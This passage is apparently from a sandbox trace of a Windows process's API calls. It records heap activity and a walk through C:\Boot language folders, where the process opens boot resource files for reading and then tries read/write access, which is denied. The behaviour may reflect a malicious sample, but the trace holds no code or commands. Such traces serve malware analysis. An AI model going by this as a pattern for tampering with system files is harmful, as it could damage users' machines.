returned 0x88400 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.985] AreFileApisANSI () returned 1 [0083.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.985] AreFileApisANSI () returned 1 [0083.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0083.985] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.985] GetFileType (hFile=0x340) returned 0x1 [0083.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.985] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.986] CloseHandle (hObject=0x340) returned 1 [0083.986] AreFileApisANSI () returned 1 [0083.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0083.986] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.986] GetLastError () returned 0x5 [0083.986] GetLastError () returned 0x5 [0083.986] SetLastError (dwErrCode=0x5) [0083.986] GetLastError () returned 0x5 [0083.986] SetLastError (dwErrCode=0x5) [0083.987] GetLastError () returned 0x5 [0083.987] SetLastError (dwErrCode=0x5) [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.987] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.988] AreFileApisANSI () returned 1 [0083.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.988] AreFileApisANSI () returned 1 [0083.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0083.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui") returned 30 [0083.988] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.988] GetFileType (hFile=0x340) returned 0x1 [0083.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.988] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.989] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.989] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.989] CloseHandle (hObject=0x340) returned 1 [0083.989] AreFileApisANSI () returned 1 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui") returned 30 [0083.989] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.989] GetLastError () returned 0x5 [0083.989] GetLastError () returned 0x5 [0083.989] SetLastError (dwErrCode=0x5) [0083.989] GetLastError () returned 0x5 [0083.989] SetLastError (dwErrCode=0x5) [0083.989] GetLastError () returned 0x5 [0083.990] SetLastError (dwErrCode=0x5) [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.990] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0083.990] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.991] AreFileApisANSI () returned 1 [0083.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT", lpUsedDefaultChar=0x0) returned 14 [0083.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.991] AreFileApisANSI () returned 1 [0083.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-PT") returned 14 [0083.991] CreateFileW (lpFileName="C:\\Boot\\pt-PT" (normalized: "c:\\boot\\pt-pt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.991] GetLastError () returned 0x5 [0083.991] GetLastError () returned 0x5 [0083.991] SetLastError (dwErrCode=0x5) [0083.991] GetLastError () returned 0x5 [0083.991] SetLastError (dwErrCode=0x5) [0083.991] GetLastError () returned 0x5 [0083.991] SetLastError (dwErrCode=0x5) [0083.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.991] AreFileApisANSI () returned 1 [0083.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88720 [0083.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-PT") returned 14 [0083.992] CreateFileW (lpFileName="C:\\Boot\\pt-PT" (normalized: "c:\\boot\\pt-pt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.992] GetLastError () returned 0x5 [0083.992] GetLastError () returned 0x5 [0083.992] SetLastError (dwErrCode=0x5) [0083.992] GetLastError () returned 0x5 [0083.992] SetLastError (dwErrCode=0x5) [0083.992] GetLastError () returned 0x5 [0083.992] SetLastError (dwErrCode=0x5) [0083.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.992] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0083.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 